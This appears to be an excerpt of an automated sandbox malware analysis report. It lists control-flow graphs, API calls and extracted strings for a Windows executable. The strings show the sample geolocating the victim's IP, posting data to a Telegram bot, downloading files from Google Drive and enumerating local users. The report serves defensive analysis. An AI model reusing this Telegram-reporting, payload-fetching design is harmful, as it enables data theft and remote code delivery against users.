7ff72c9c4c75-7ff72c9c4c7a call 7ff72c9fcd30 4340->4349 4358 7ff72c9c4c7b-7ff72c9c4c80 call 7ff72c9fcd30 4349->4358 4370 7ff72c9c4c81-7ff72c9c4c86 call 7ff72c9fcd30 4358->4370 4365 7ff72c9c4aa0-7ff72c9c4aa7 call 7ff72c9fc0fc 4362->4365 4366 7ff72c9c4aac-7ff72c9c4abd 4362->4366 4365->4366 4368 7ff72c9c4abf-7ff72c9c4ae7 call 7ff72c9f2a74 call 7ff72c9f2790 4366->4368 4369 7ff72c9c4ae8-7ff72c9c4b6d call 7ff72c9ccf20 call 7ff72c9f0ad8 4366->4369 4368->4369 4397 7ff72c9c4b6f-7ff72c9c4b83 4369->4397 4398 7ff72c9c4ba3-7ff72c9c4bc7 4369->4398 4384 7ff72c9c4c87-7ff72c9c4c8f call 7ff72c9fcd30 4370->4384 4385 7ff72c9c4282-7ff72c9c4296 4380->4385 4386 7ff72c9c42b6-7ff72c9c42d7 4380->4386 4388 7ff72c9c42e5-7ff72c9c42f7 4381->4388 4389 7ff72c9c4317-7ff72c9c433a call 7ff72c9e8de0 4381->4389 4393 7ff72c9c42b1 call 7ff72c9f2790 4385->4393 4394 7ff72c9c4298-7ff72c9c42ab 4385->4394 4386->4381 4395 7ff72c9c4312 call 7ff72c9f2790 4388->4395 4396 7ff72c9c42f9-7ff72c9c430c 4388->4396 4407 7ff72c9c4365-7ff72c9c4377 call 7ff72c9e8de0 4389->4407 4408 7ff72c9c433c-7ff72c9c4364 call 7ff72c9f2a74 call 7ff72c9f2790 4389->4408 4393->4386 4394->4326 4394->4393 4395->4389 4396->4326 4396->4395 4404 7ff72c9c4b85-7ff72c9c4b98 4397->4404 4405 7ff72c9c4b9e call 7ff72c9f2790 4397->4405 4400 7ff72c9c4bfa-7ff72c9c4c05 4398->4400 4401 7ff72c9c4bc9-7ff72c9c4bdd 4398->4401 4400->4303 4411 7ff72c9c4c0b-7ff72c9c4c1f 4400->4411 4409 7ff72c9c4bdf-7ff72c9c4bf2 4401->4409 4410 7ff72c9c4bf4-7ff72c9c4bf9 call 7ff72c9f2790 4401->4410 4404->4384 4404->4405 4405->4398 4422 7ff72c9c43a1-7ff72c9c45d2 call 7ff72c9e8bc0 call 7ff72c9e74c0 call 7ff72c9e92e0 call 7ff72c9e8c50 call 7ff72c9e8e50 call 7ff72c9e7c70 call 7ff72c9e8bc0 call 7ff72c9e74c0 call 7ff72c9e92e0 call 7ff72c9e8c50 call 7ff72c9e8e50 call 7ff72c9e7c70 call 7ff72c9e8bc0 call 7ff72c9e74c0 call 7ff72c9e92e0 call 7ff72c9e8c50 call 7ff72c9e8e50 call 7ff72c9e7c70 call 7ff72c9d08c0 call 7ff72c9d5ef0 call 7ff72c9d08c0 call 7ff72c9d5ef0 4407->4422 4423 7ff72c9c4379-7ff72c9c439c call 7ff72c9f2a74 call 7ff72c9f2790 4407->4423 4408->4407 4409->4305 4409->4410 4410->4400 4411->4308 4416 7ff72c9c4c25-7ff72c9c4c38 4411->4416 4416->4315 4420 7ff72c9c4c3a 4416->4420 4420->4308 4472 7ff72c9c45d4-7ff72c9c45e8 4422->4472 4473 7ff72c9c4608-7ff72c9c4626 4422->4473 4423->4422 4474 7ff72c9c4603 call 7ff72c9f2790 4472->4474 4475 7ff72c9c45ea-7ff72c9c45fd 4472->4475 4476 7ff72c9c465a-7ff72c9c4663 4473->4476 4477 7ff72c9c4628-7ff72c9c4639 4473->4477 4474->4473 4475->4290 4475->4474 4478 7ff72c9c4665-7ff72c9c4677 4476->4478 4479 7ff72c9c4697-7ff72c9c46b3 4476->4479 4481 7ff72c9c4654-7ff72c9c4659 call 7ff72c9f2790 4477->4481 4482 7ff72c9c463b-7ff72c9c464e 4477->4482 4484 7ff72c9c4692 call 7ff72c9f2790 4478->4484 4485 7ff72c9c4679-7ff72c9c468c 4478->4485 4486 7ff72c9c46b5-7ff72c9c46c7 4479->4486 4487 7ff72c9c46e8-7ff72c9c46f0 4479->4487 4481->4476 4482->4307 4482->4481 4484->4479 4485->4324 4485->4484 4490 7ff72c9c46e2-7ff72c9c46e7 call 7ff72c9f2790 4486->4490 4491 7ff72c9c46c9-7ff72c9c46dc 4486->4491 4492 7ff72c9c46f2-7ff72c9c4703 4487->4492 4493 7ff72c9c4723-7ff72c9c4743 call 7ff72c9e8de0 4487->4493 4490->4487 4491->4334 4491->4490 4494 7ff72c9c4705-7ff72c9c4718 4492->4494 4495 7ff72c9c471e call 7ff72c9f2790 4492->4495 4501 7ff72c9c4745-7ff72c9c476d call 7ff72c9f2a74 call 7ff72c9f2790 4493->4501 4502 7ff72c9c476e-7ff72c9c477e call 7ff72c9e8de0 4493->4502 4494->4340 4494->4495 4495->4493 4501->4502 4508 7ff72c9c4780-7ff72c9c47a8 call 7ff72c9f2a74 call 7ff72c9f2790 4502->4508 4509 7ff72c9c47a9-7ff72c9c47b1 4502->4509 4508->4509 4510 7ff72c9c47e4-7ff72c9c4807 call 7ff72c9e8de0 4509->4510 4511 7ff72c9c47b3-7ff72c9c47c4 4509->4511 4522 7ff72c9c4832-7ff72c9c4848 call 7ff72c9e8de0 4510->4522 4523 7ff72c9c4809-7ff72c9c4831 call 7ff72c9f2a74 call 7ff72c9f2790 4510->4523 4515 7ff72c9c47df call 7ff72c9f2790 4511->4515 4516 7ff72c9c47c6-7ff72c9c47d9 4511->4516 4515->4510 4516->4349 4516->4515 4528 7ff72c9c4873-7ff72c9c487b 4522->4528 4529 7ff72c9c484a-7ff72c9c4872 call 7ff72c9f2a74 call 7ff72c9f2790 4522->4529 4523->4522 4532 7ff72c9c48ae-7ff72c9c48d4 call 7ff72c9e8de0 4528->4532 4533 7ff72c9c487d-7ff72c9c488e 4528->4533 4529->4528 4542 7ff72c9c48ff-7ff72c9c4915 call 7ff72c9e8de0 4532->4542 4543 7ff72c9c48d6-7ff72c9c48fe call 7ff72c9f2a74 call 7ff72c9f2790 4532->4543 4536 7ff72c9c4890-7ff72c9c48a3 4533->4536 4537 7ff72c9c48a9 call 7ff72c9f2790 4533->4537 4536->4358 4536->4537 4537->4532 4550 7ff72c9c493f-7ff72c9c4972 call 7ff72c9cf4e0 * 2 4542->4550 4551 7ff72c9c4917-7ff72c9c493a call 7ff72c9f2a74 call 7ff72c9f2790 4542->4551 4543->4542 4560 7ff72c9c4974-7ff72c9c4988 4550->4560 4561 7ff72c9c49a8-7ff72c9c49e5 call 7ff72c9e8de0 4550->4561 4551->4550 4562 7ff72c9c49a3 call 7ff72c9f2790 4560->4562 4563 7ff72c9c498a-7ff72c9c499d 4560->4563 4567 7ff72c9c4a10-7ff72c9c4a1c 4561->4567 4568 7ff72c9c49e7-7ff72c9c4a0f call 7ff72c9f2a74 call 7ff72c9f2790 4561->4568 4562->4561 4563->4370 4563->4562 4567->4362 4570 7ff72c9c4a1e-7ff72c9c4a21 4567->4570 4568->4567 4572 7ff72c9c4a23-7ff72c9c4a26 4570->4572 4573 7ff72c9c4a2c-7ff72c9c4a36 4570->4573 4572->4366 4572->4573 4573->4366 4574 7ff72c9c4a38-7ff72c9c4a50 call 7ff72c9ea060 call 7ff72c9f2790 4573->4574 4574->4366
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseHandle$FileOpenRead
                                                                                                                                                                  • String ID: *L\(&.$Could not fetch IP$Error parsing JSON response: $IPInfoFetcher$InternetOpen failed.$InternetOpenUrl failed.$Location not available$N/A$city$country$https://ipinfo.io/json$region
                                                                                                                                                                  • API String ID: 427349759-574423550
                                                                                                                                                                  • Opcode ID: 58ffc4d046cca1e95bd368871505dfab2008cae1416945f4e614302b2e31a680
                                                                                                                                                                  • Instruction ID: 6e82300eb563a12466b0901117e28950c835732cd3150513d87eeaca4c753cd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 58ffc4d046cca1e95bd368871505dfab2008cae1416945f4e614302b2e31a680
                                                                                                                                                                  • Instruction Fuzzy Hash: BF927622B18BC245EB20EF24DC543FD6361EB657A8F805631DA5D07ADADF78E640CB50
                                                                                                                                                                  Function 00007FF72C9B7C50 Relevance: 55.1, APIs: 19, Strings: 12, Instructions: 827comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page$__std_fs_convert_narrow_to_wide$ApisCreateFileInitializeInstance
                                                                                                                                                                  • String ID: does not exist or is not accessible.$*L\(&.$C:\Users$Failed to create ShellLink COM object.$Failed to get IPersistFile interface.$Failed to save shortcut file.$The directory $User: $directory_entry::status$directory_iterator::directory_iterator$exists$status
                                                                                                                                                                  • API String ID: 2171753736-2851832695
                                                                                                                                                                  • Opcode ID: 5e2a96f7ca63f26869e68c91b0ce2bb6b1c597c58515fa82a34e911a5c6d684c
                                                                                                                                                                  • Instruction ID: 7742b5fc97d5d79a6c790227b2390ca6664f19e0412553a070770a4b8effdc9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e2a96f7ca63f26869e68c91b0ce2bb6b1c597c58515fa82a34e911a5c6d684c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8572D462F18B4695EB10EB65D8442BDA361FF69BB4F804631DE9C13A99DF3CE580CB10
                                                                                                                                                                  Function 00007FF72C9B9B00 Relevance: 49.7, APIs: 17, Strings: 11, Instructions: 741fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileFind$CloseConcurrency::cancel_current_taskDeleteEnvironmentFirstNextVariable
                                                                                                                                                                  • String ID: *L\(&.$.lnk$C:\Users\$Deleted: $Error finding user directories$Failed to delete: $USERPROFILE$\Desktop$directory_entry::status$directory_iterator::directory_iterator$exists
                                                                                                                                                                  • API String ID: 1014275803-3978257810
                                                                                                                                                                  • Opcode ID: 811282472416ae1783f424dbd5c13e12312b9a29ec11f78a58be7286b119b0da
                                                                                                                                                                  • Instruction ID: 40bd1ab49800e62e25dc6d1cb71ce438ec4bb2fac55d6205bef71c036c49e7d2
                                                                                                                                                                  • Opcode Fuzzy Hash: 811282472416ae1783f424dbd5c13e12312b9a29ec11f78a58be7286b119b0da
                                                                                                                                                                  • Instruction Fuzzy Hash: 48728972A18B8691EA20EB15E8443BEE361FBA57B4F904231DADD036D5DF7CE584CB10
                                                                                                                                                                  Function 00007FF72C9C4D20 Relevance: 42.4, APIs: 15, Strings: 9, Instructions: 446networkfileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 5151 7ff72c9c4d20-7ff72c9c4d90 call 7ff72c9f3600 InternetOpenA 5154 7ff72c9c4d96-7ff72c9c4dc5 call 7ff72c9d44a0 5151->5154 5155 7ff72c9c4e2b-7ff72c9c4e47 5151->5155 5163 7ff72c9c4df9-7ff72c9c4e2a call 7ff72c9f2770 5154->5163 5164 7ff72c9c4dc7-7ff72c9c4dd9 5154->5164 5156 7ff72c9c4e51 5155->5156 5157 7ff72c9c4e49-7ff72c9c4e4f 5155->5157 5159 7ff72c9c4e54-7ff72c9c4e61 5156->5159 5157->5159 5161 7ff72c9c4f08-7ff72c9c4f1d 5159->5161 5162 7ff72c9c4e67 5159->5162 5165 7ff72c9c4f23-7ff72c9c4f28 5161->5165 5166 7ff72c9c541a-7ff72c9c541f call 7ff72c9b2410 5161->5166 5167 7ff72c9c4e70-7ff72c9c4e7d call 7ff72c9f9430 5162->5167 5168 7ff72c9c4df4 call 7ff72c9f2790 5164->5168 5169 7ff72c9c4ddb-7ff72c9c4dee 5164->5169 5172 7ff72c9c4f2a 5165->5172 5173 7ff72c9c4f2d-7ff72c9c4fa1 call 7ff72c9d60e0 call 7ff72c9d08c0 5165->5173 5183 7ff72c9c5420-7ff72c9c5425 call 7ff72c9fcd30 5166->5183 5184 7ff72c9c4ec2-7ff72c9c4ede call 7ff72c9b2210 5167->5184 5185 7ff72c9c4e7f-7ff72c9c4e8a 5167->5185 5168->5163 5169->5168 5175 7ff72c9c5414-7ff72c9c5419 call 7ff72c9fcd30 5169->5175 5172->5173 5200 7ff72c9c4fa6-7ff72c9c50b6 call 7ff72c9d08c0 * 4 5173->5200 5201 7ff72c9c4fa3 5173->5201 5175->5166 5198 7ff72c9c5426-7ff72c9c542b call 7ff72c9fcd30 5183->5198 5197 7ff72c9c4ee5-7ff72c9c4eed 5184->5197 5188 7ff72c9c4e8c-7ff72c9c4ea9 5185->5188 5189 7ff72c9c4eab-7ff72c9c4ec0 call 7ff72c9d48f0 5185->5189 5193 7ff72c9c4efc-7ff72c9c4f02 5188->5193 5189->5193 5193->5161 5193->5167 5197->5197 5202 7ff72c9c4eef-7ff72c9c4ef7 call 7ff72c9d08c0 5197->5202 5209 7ff72c9c542c-7ff72c9c5431 call 7ff72c9fcd30 5198->5209 5221 7ff72c9c50e9-7ff72c9c5102 5200->5221 5222 7ff72c9c50b8-7ff72c9c50c9 5200->5222 5201->5200 5202->5193 5215 7ff72c9c5432-7ff72c9c5437 call 7ff72c9fcd30 5209->5215 5220 7ff72c9c5438-7ff72c9c543d call 7ff72c9fcd30 5215->5220 5238 7ff72c9c543e-7ff72c9c5443 call 7ff72c9fcd30 5220->5238 5226 7ff72c9c5135-7ff72c9c5146 5221->5226 5227 7ff72c9c5104-7ff72c9c5115 5221->5227 5224 7ff72c9c50e4 call 7ff72c9f2790 5222->5224 5225 7ff72c9c50cb-7ff72c9c50de 5222->5225 5224->5221 5225->5183 5225->5224 5228 7ff72c9c5179-7ff72c9c518b 5226->5228 5229 7ff72c9c5148-7ff72c9c5159 5226->5229 5232 7ff72c9c5130 call 7ff72c9f2790 5227->5232 5233 7ff72c9c5117-7ff72c9c512a 5227->5233 5236 7ff72c9c51bf-7ff72c9c51d2 5228->5236 5237 7ff72c9c518d-7ff72c9c519f 5228->5237 5234 7ff72c9c5174 call 7ff72c9f2790 5229->5234 5235 7ff72c9c515b-7ff72c9c516e 5229->5235 5232->5226 5233->5198 5233->5232 5234->5228 5235->5209 5235->5234 5244 7ff72c9c5205-7ff72c9c523e InternetOpenUrlA 5236->5244 5245 7ff72c9c51d4-7ff72c9c51e5 5236->5245 5241 7ff72c9c51a1-7ff72c9c51b4 5237->5241 5242 7ff72c9c51ba call 7ff72c9f2790 5237->5242 5254 7ff72c9c5444-7ff72c9c5449 call 7ff72c9f28a0 5238->5254 5241->5215 5241->5242 5242->5236 5250 7ff72c9c531f-7ff72c9c5351 call 7ff72c9d44a0 5244->5250 5251 7ff72c9c5244-7ff72c9c525d InternetReadFile 5244->5251 5248 7ff72c9c5200 call 7ff72c9f2790 5245->5248 5249 7ff72c9c51e7-7ff72c9c51fa 5245->5249 5248->5244 5249->5220 5249->5248 5259 7ff72c9c5385-7ff72c9c5397 InternetCloseHandle 5250->5259 5261 7ff72c9c5353-7ff72c9c5365 5250->5261 5252 7ff72c9c5314-7ff72c9c531d InternetCloseHandle 5251->5252 5253 7ff72c9c5263-7ff72c9c5268 5251->5253 5252->5259 5253->5252 5257 7ff72c9c526e-7ff72c9c5274 5253->5257 5272 7ff72c9c544a-7ff72c9c544f call 7ff72c9fcd30 5254->5272 5257->5254 5262 7ff72c9c527a-7ff72c9c529c 5257->5262 5263 7ff72c9c53c6-7ff72c9c53d7 5259->5263 5264 7ff72c9c5399-7ff72c9c53aa 5259->5264 5266 7ff72c9c5380 call 7ff72c9f2790 5261->5266 5267 7ff72c9c5367-7ff72c9c537a 5261->5267 5268 7ff72c9c52a0-7ff72c9c52a8 5262->5268 5263->5163 5271 7ff72c9c53dd-7ff72c9c53ee 5263->5271 5269 7ff72c9c53c1 call 7ff72c9f2790 5264->5269 5270 7ff72c9c53ac-7ff72c9c53bf 5264->5270 5266->5259 5267->5266 5267->5272 5268->5268 5274 7ff72c9c52aa-7ff72c9c52c1 call 7ff72c9d44a0 5268->5274 5269->5263 5270->5269 5275 7ff72c9c540e-7ff72c9c5413 call 7ff72c9fcd30 5270->5275 5271->5168 5277 7ff72c9c53f4-7ff72c9c5407 5271->5277 5285 7ff72c9c52f5-7ff72c9c530e InternetReadFile 5274->5285 5286 7ff72c9c52c3-7ff72c9c52d5 5274->5286 5275->5175 5277->5175 5280 7ff72c9c5409 5277->5280 5280->5168 5285->5252 5285->5253 5287 7ff72c9c52f0 call 7ff72c9f2790 5286->5287 5288 7ff72c9c52d7-7ff72c9c52ea 5286->5288 5287->5285 5288->5238 5288->5287
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Internet$CloseFileHandleOpenRead
                                                                                                                                                                  • String ID: %%%02X$&parse_mode=HTML$&text=$*L\(&.$/sendMessage?chat_id=$InternetOpen failed.$InternetOpenUrl failed.$TelegramBot$https://api.telegram.org/bot
                                                                                                                                                                  • API String ID: 490362910-2377324344
                                                                                                                                                                  • Opcode ID: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
                                                                                                                                                                  • Instruction ID: c163ede0effed24da6ae0b13f51af452b0940d6e3520b6aa47bcbd2b45a71b20
                                                                                                                                                                  • Opcode Fuzzy Hash: 2116c08122732905607294f5540b89ffce0c194dcefc27091b70f05a335ee373
                                                                                                                                                                  • Instruction Fuzzy Hash: BD12CB62E18B8545E710EB34D8443BD6761FBA97B8F905331EAAC02AD6DF7CE180DB50
                                                                                                                                                                  Function 00007FF72C9B6190 Relevance: 40.6, APIs: 12, Strings: 11, Instructions: 360networkfileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 5290 7ff72c9b6190-7ff72c9b61ec call 7ff72c9f3600 5293 7ff72c9b61f2-7ff72c9b6200 5290->5293 5294 7ff72c9b62f7-7ff72c9b62fe 5290->5294 5295 7ff72c9b6206-7ff72c9b620b 5293->5295 5296 7ff72c9b6757-7ff72c9b675c call 7ff72c9b2410 5293->5296 5297 7ff72c9b6300-7ff72c9b6309 5294->5297 5298 7ff72c9b631a-7ff72c9b6328 5294->5298 5300 7ff72c9b6210-7ff72c9b6274 call 7ff72c9d60e0 call 7ff72c9d08c0 5295->5300 5301 7ff72c9b620d 5295->5301 5313 7ff72c9b675d-7ff72c9b6762 call 7ff72c9fcd30 5296->5313 5302 7ff72c9b630e-7ff72c9b6315 call 7ff72c9d06d0 5297->5302 5303 7ff72c9b630b 5297->5303 5304 7ff72c9b6751-7ff72c9b6756 call 7ff72c9b2410 5298->5304 5305 7ff72c9b632e-7ff72c9b6368 call 7ff72c9d60e0 5298->5305 5329 7ff72c9b62b1-7ff72c9b62c1 5300->5329 5330 7ff72c9b6276-7ff72c9b6287 5300->5330 5301->5300 5302->5298 5303->5302 5304->5296 5315 7ff72c9b636a-7ff72c9b637c 5305->5315 5316 7ff72c9b639c-7ff72c9b63aa 5305->5316 5328 7ff72c9b6763-7ff72c9b6768 call 7ff72c9fcd30 5313->5328 5319 7ff72c9b6397 call 7ff72c9f2790 5315->5319 5320 7ff72c9b637e-7ff72c9b6391 5315->5320 5316->5304 5321 7ff72c9b63b0-7ff72c9b63b8 5316->5321 5319->5316 5320->5319 5324 7ff72c9b6769-7ff72c9b676f call 7ff72c9fcd30 5320->5324 5326 7ff72c9b63ba 5321->5326 5327 7ff72c9b63bd-7ff72c9b63e9 call 7ff72c9d60e0 5321->5327 5326->5327 5345 7ff72c9b641d-7ff72c9b6440 InternetOpenA 5327->5345 5346 7ff72c9b63eb-7ff72c9b63fd 5327->5346 5328->5324 5329->5298 5331 7ff72c9b62c3-7ff72c9b62d5 5329->5331 5335 7ff72c9b62a2-7ff72c9b62ac call 7ff72c9f2790 5330->5335 5336 7ff72c9b6289-7ff72c9b629c 5330->5336 5338 7ff72c9b62f0-7ff72c9b62f5 call 7ff72c9f2790 5331->5338 5339 7ff72c9b62d7-7ff72c9b62ea 5331->5339 5335->5329 5336->5313 5336->5335 5338->5298 5339->5328 5339->5338 5347 7ff72c9b64b1-7ff72c9b64e1 InternetOpenUrlA 5345->5347 5348 7ff72c9b6442-7ff72c9b6474 call 7ff72c9d44a0 5345->5348 5350 7ff72c9b63ff-7ff72c9b6412 5346->5350 5351 7ff72c9b6418 call 7ff72c9f2790 5346->5351 5353 7ff72c9b6552-7ff72c9b655a 5347->5353 5354 7ff72c9b64e3-7ff72c9b6515 call 7ff72c9d44a0 5347->5354 5360 7ff72c9b66e9 5348->5360 5361 7ff72c9b647a-7ff72c9b648c 5348->5361 5350->5324 5350->5351 5351->5345 5357 7ff72c9b655f-7ff72c9b6571 call 7ff72c9f9edc 5353->5357 5358 7ff72c9b655c 5353->5358 5368 7ff72c9b66e0-7ff72c9b66e3 InternetCloseHandle 5354->5368 5369 7ff72c9b651b-7ff72c9b652d 5354->5369 5373 7ff72c9b6671-7ff72c9b66a3 call 7ff72c9d44a0 5357->5373 5374 7ff72c9b6577-7ff72c9b657c 5357->5374 5358->5357 5364 7ff72c9b66eb-7ff72c9b66f3 5360->5364 5365 7ff72c9b64a7-7ff72c9b64ac call 7ff72c9f2790 5361->5365 5366 7ff72c9b648e-7ff72c9b64a1 5361->5366 5370 7ff72c9b6722-7ff72c9b674a call 7ff72c9f2770 5364->5370 5371 7ff72c9b66f5-7ff72c9b6706 5364->5371 5365->5360 5366->5324 5366->5365 5368->5360 5375 7ff72c9b652f-7ff72c9b6542 5369->5375 5376 7ff72c9b6548-7ff72c9b654d call 7ff72c9f2790 5369->5376 5377 7ff72c9b6708-7ff72c9b671b 5371->5377 5378 7ff72c9b671d call 7ff72c9f2790 5371->5378 5393 7ff72c9b66a5-7ff72c9b66b7 5373->5393 5394 7ff72c9b66d7-7ff72c9b66da InternetCloseHandle 5373->5394 5374->5373 5380 7ff72c9b6582-7ff72c9b659b InternetReadFile 5374->5380 5375->5324 5375->5376 5376->5368 5377->5378 5385 7ff72c9b674b-7ff72c9b6750 call 7ff72c9fcd30 5377->5385 5378->5370 5387 7ff72c9b65d7-7ff72c9b65db call 7ff72c9f8fe0 5380->5387 5388 7ff72c9b659d 5380->5388 5385->5304 5400 7ff72c9b65e0-7ff72c9b65fd InternetCloseHandle * 2 5387->5400 5391 7ff72c9b65a0-7ff72c9b65a5 5388->5391 5391->5387 5396 7ff72c9b65a7-7ff72c9b65d5 call 7ff72c9f9c48 InternetReadFile 5391->5396 5398 7ff72c9b66d2 call 7ff72c9f2790 5393->5398 5399 7ff72c9b66b9-7ff72c9b66cc 5393->5399 5394->5368 5396->5387 5396->5391 5398->5394 5399->5324 5399->5398 5400->5304 5402 7ff72c9b6603-7ff72c9b6608 5400->5402 5404 7ff72c9b660a 5402->5404 5405 7ff72c9b660d-7ff72c9b6639 call 7ff72c9d60e0 5402->5405 5404->5405 5409 7ff72c9b666d-7ff72c9b666f 5405->5409 5410 7ff72c9b663b-7ff72c9b664d 5405->5410 5409->5364 5411 7ff72c9b664f-7ff72c9b6662 5410->5411 5412 7ff72c9b6668 call 7ff72c9f2790 5410->5412 5411->5324 5411->5412 5412->5409
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle_invalid_parameter_noinfo_noreturn$FileOpenRead
                                                                                                                                                                  • String ID: &export=download$*$*L\(&.$DST: $Failed to open file for writing.$File downloaded successfully and saved as $FileDownloader$InternetOpen failed.$InternetOpenUrl failed.$URL: $https://drive.google.com/uc?id=
                                                                                                                                                                  • API String ID: 1313048855-3458622595
                                                                                                                                                                  • Opcode ID: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
                                                                                                                                                                  • Instruction ID: 42b94a423962e925a1308c401f4789ae95ad6197e3941f3bd5d1085132bc7f68
                                                                                                                                                                  • Opcode Fuzzy Hash: f90a2fdffaa1c6873038af76952001493e8ca45214174326fbfaffb7a70e20a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 36F1D862F18B4681FA14EB64E8443BDA361FB65BB4F904231DA9C46AD9DF7CF480CB10
                                                                                                                                                                  Function 00007FF72C9B8A90 Relevance: 35.1, APIs: 5, Strings: 15, Instructions: 144COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • NetUserEnum.NETAPI32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8B31
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8B92
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8BE6
                                                                                                                                                                  • NetApiBufferFree.NETAPI32(?,?,?,?,?,00000000,?,00007FF72C9B93EA), ref: 00007FF72C9B8C72
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9B8CB9
